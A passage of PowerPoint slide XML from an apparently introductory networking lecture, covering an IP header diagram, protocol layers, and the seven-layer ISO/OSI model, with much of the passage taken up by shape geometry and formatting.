            <a:r>
              <a:rPr sz="1100" spc="-20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Checksum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2031364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Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> Address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1778635" algn="l"/>
                <a:tab pos="5398770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b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1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1778635" algn="l"/>
                <a:tab pos="4051300" algn="l"/>
                <a:tab pos="4472940" algn="l"/>
                <a:tab pos="5398135" algn="l"/>
              </a:tabLst>
            </a:pP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Options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10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Padding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>|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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+-+-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10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+-+-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-50" dirty="0"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E1C98C0C-4700-8320-F571-D795506DAF00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="696468" y="3805428"/>
            <a:ext cx="817244" cy="273050"/>
            <a:chOff x="696468" y="3805428"/>
            <a:chExt cx="817244" cy="273050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DF399009-0F21-6282-03F7-65A92CBAB99D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="702564" y="3811524"/>
              <a:ext cx="805180" cy="260985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="805180" h="260985">
                  <a:moveTo>
                    <a:pt x="674370" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674370" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="195453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="195453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="260603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804672" y="130301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6743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EB98960B-84BC-E1FC-86CD-7F4B4BFB988F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="702564" y="3811524"/>
              <a:ext cx="805180" cy="260985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="805180" h="260985">
                  <a:moveTo>
                    <a:pt x="0" y="65150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674370" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804672" y="130301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="260603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="195453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="195453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6515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8523220D-0493-B2C9-747B-59BEBC672BF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D1AF1229-8A81-55D2-FC08-E0192DD8A1F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31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4037124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5AEAE7A-149A-4DC5-B7F4-9EF4A4B91684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EA40AC6-CA00-5A8E-2AA0-3EF152DDDB1B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ar-JO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3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ar-JO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Protocol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Layers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A75DD78-7CA8-FBCA-51FA-181838B00224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4B40E19-9544-5777-D98D-45C788C6150A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32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72F3700-7A1C-537F-D1D6-83F5857A4222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1190868"/>
            <a:ext cx="7668259" cy="324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1333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previous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example,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saw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header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IP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(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Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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).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There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many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protocols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out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there,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each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specific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purpose.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Purposes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such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as:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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Exchanging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emails,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files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performing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VoIP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calls</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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Establishing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communication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between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a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client</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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Identifying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computers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endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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Transmitting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data</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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77C15C-18A7-E80E-05B3-55BBE65A4725}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4967280" y="2819520"/>
              <a:ext cx="905400" cy="1143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77C15C-18A7-E80E-05B3-55BBE65A47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7920" y="2810160"/>
                <a:ext cx="924120" cy="11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E3A8F85-05D9-F1BE-91D1-4EF34D6090E8}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4207545" y="340450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E3A8F85-05D9-F1BE-91D1-4EF34D6090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1425" y="33983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18BF7B1-E437-B063-1660-7315B12536B5}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6660945" y="365002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18BF7B1-E437-B063-1660-7315B12536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4825" y="36439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83A3F0-70B7-D26E-90D2-637BC6BF6451}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6675705" y="388798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83A3F0-70B7-D26E-90D2-637BC6BF64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9585" y="38818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2B5F40-0420-5A90-B6DD-FA53A49666EA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4178025" y="1948300"/>
              <a:ext cx="148320" cy="103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2B5F40-0420-5A90-B6DD-FA53A49666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1905" y="1942180"/>
                <a:ext cx="1605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B4824D-C9C4-B759-4A39-4B12DA081767}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6846705" y="373174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B4824D-C9C4-B759-4A39-4B12DA0817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0585" y="372562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753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5E9F907-31CF-5CFA-93F3-B1DCA8618811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E776F02-7ACC-2704-D7A0-0D77C87C4FBC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3 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Protocol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Layers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684CA5A-0823-07A7-D916-3E7326C17633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CFEA3AD-F104-51FC-5FDC-7055442674AB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33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B02F0E0-890E-09FF-FB15-5C8E78072CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1493839"/>
            <a:ext cx="7983220" cy="264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Instead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using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specific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examples,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let’s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rewrite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previous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list</a:t>
            </a:r>
            <a:endParaRPr sz="2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focusing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features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provides:</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="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038225" algn="l"/>
              </a:tabLst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Make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application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(email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client,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FTP,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browser,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…)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work</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="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1038225" algn="l"/>
              </a:tabLst>
            </a:pP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Transport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data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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between</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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processes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(the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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server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2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endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="103822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client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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programs)</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="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1038225" algn="l"/>
              </a:tabLst>
            </a:pP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Identify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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hosts</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="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038225" algn="l"/>
              </a:tabLst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physical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media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send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packets</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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6207DDF-3017-6B4E-C7EB-2C0671CD96E7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5443560" y="2995560"/>
              <a:ext cx="50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6207DDF-3017-6B4E-C7EB-2C0671CD96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34200" y="2986200"/>
                <a:ext cx="2376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929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F8F53C1-F09F-727B-449C-6538A6FAD7BC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93ACAD5-FC09-46A2-AD28-EB5C99DE578D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3 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Protocol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Layers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21D12F0-4F1B-DFD5-F6A3-0E0365862739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226B004-F7CC-27E8-4480-E0004CDE12BF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34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9FF47BF-E8D2-3541-6180-760511604E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1161213"/>
            <a:ext cx="7658734" cy="346582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Moreover,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we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rewrite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list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again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as:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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Application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endParaRPr sz="2400" dirty="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Transport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endParaRPr sz="2400" dirty="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endParaRPr sz="2400" dirty="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Physical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These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layers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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work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top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another,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every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own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 dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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EDE40F-CF4A-C20C-7EA6-9E017CFC0B3E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="453105" y="143458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EDE40F-CF4A-C20C-7EA6-9E017CFC0B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985" y="14284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7D367B-428B-045A-0B4D-7B72DF66AE40}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="163305" y="169486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7D367B-428B-045A-0B4D-7B72DF66AE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185" y="16887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54E1B6-2BA3-7B32-72B2-C38FCAFB452E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="519120" y="1924200"/>
              <a:ext cx="2014920" cy="1343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54E1B6-2BA3-7B32-72B2-C38FCAFB45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760" y="1914840"/>
                <a:ext cx="2033640" cy="13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4832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68F1041B-7E17-075E-5B02-4027EB1524D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498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855A9ED7-4D33-32AD-F0E3-1DCC2287FAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114046"/>
            <a:ext cx="7936052" cy="737458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="288366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27455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lang="en-US" dirty="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Layers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274DB7C-6D06-8B92-FB1E-0E20418F70CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4836078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CEAC2CB-75B1-4BDB-2375-4AECCCD946D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4846724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35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B80BC42-70DF-F4A4-D714-91078119A258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474185" y="1984804"/>
            <a:ext cx="621030" cy="2310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4610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>EXAMPLE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2EC6A331-908E-3115-53D3-E6C07A4100F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1653920" y="1448562"/>
            <a:ext cx="6625590" cy="264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Each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serves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one</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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above</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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it.</a:t>
            </a:r>
            <a:endParaRPr sz="22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2200" dirty="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application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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r>
              <a:rPr sz="2200" b="1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does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need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know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to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identify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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b="1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process</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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host,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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reach</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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200" b="1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how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200" b="1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b="1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copper</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1" spc="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wire</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1" spc="-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establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="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communication.</a:t>
            </a:r>
            <a:endParaRPr sz="22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2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just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uses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its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underlying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layers.</a:t>
            </a:r>
            <a:endParaRPr sz="22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05519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436084A-E18F-06C2-0D40-E0A8A048BD30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23D2209-A16E-6032-28CB-C5982F2BA6CC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4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ISO/OSI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26B7F7F-C88C-9E9C-4E96-68300C1BB0DA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6F4B9B6-3547-95B6-C138-0ED4ED931208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36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43A38AF-9171-A160-9423-37EDF1D9985C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1446594"/>
            <a:ext cx="7998459" cy="273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14097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1984,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International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Organization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Standardization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(ISO)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published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theoretical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model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systems communication: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Open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System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Interconnection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(OSI) model.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 dirty="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ISO/OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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model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was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never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implemented,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but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widely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literature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when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talking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about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networks.</a:t>
            </a:r>
            <a:endParaRPr sz="24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1042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8872C07-0D1C-8261-A490-58F45FBBE128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537146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4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ISO/OSI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C5EF808-7363-1E93-470E-B36BBCC61ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536537" y="1267449"/>
            <a:ext cx="3552190" cy="17081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ISO/OSI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consists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seven layers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a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reference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implementation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actual protocols.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robo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ACD9765-3850-1056-5B69-284D434FDD33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536537" y="3388806"/>
            <a:ext cx="2499995" cy="10502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defPPr>
              <a:defRPr kern="0"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="39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find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more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information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about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ISO/OSI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Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>here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719D77CD-7A65-C79B-6609-64228E24E114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4584332" y="1147688"/>
            <a:ext cx="3741420" cy="469900"/>
            <a:chOff x="4458462" y="1146810"/>
            <a:chExt cx="3741420" cy="469900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="object 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3421777F-3A85-28C5-AC79-8F9D73731E15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="1146810"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="3694430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430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7" name="object 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871F3084-3C22-B4AA-8392-9D80C9651FA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="1146810"/>
              <a:ext cx="3741420" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="469900">
                  <a:moveTo>
                    <a:pt x="0" y="46989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3681" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="3681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="13731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="28664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469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B92EDB4A-50C2-8D54-3AFF-07AC68DC4871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5858015" y="1185787"/>
            <a:ext cx="1193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569CBA0D-837E-817E-D804-48F4348A21CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4584332" y="1646035"/>
            <a:ext cx="3741420" cy="467995"/>
            <a:chOff x="4458462" y="1645157"/>
            <a:chExt cx="3741420" cy="467995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{926412F4-D3D7-A73F-29AA-5970DF875D26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="1645157"/>
              <a:ext cx="3741420" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="467994">
                  <a:moveTo>
                    <a:pt x="3694684" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46736" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28557" y="3677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13700" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677" y="28557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="421131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677" y="439310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13700" y="454167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28557" y="464190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46736" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694684" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712862" y="464190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727719" y="454167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737742" y="439310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="421131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741419" y="46736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737742" y="28557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727719" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712862" y="3677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694684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5" name="object 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA79CB6E-4C06-F55D-D3D7-9875019D4C52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4458462" y="1645157"/>
              <a:ext cx="3741420" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3741420" h="467994">
                  <a:moveTo>
                    <a:pt x="0" y="46736"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3677" y="28557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13700" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28557" y="3677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46736" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694684" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712862" y="3677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727719" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737742" y="28557"/>
                  </a:lnTo>
                  <a:lnTo>
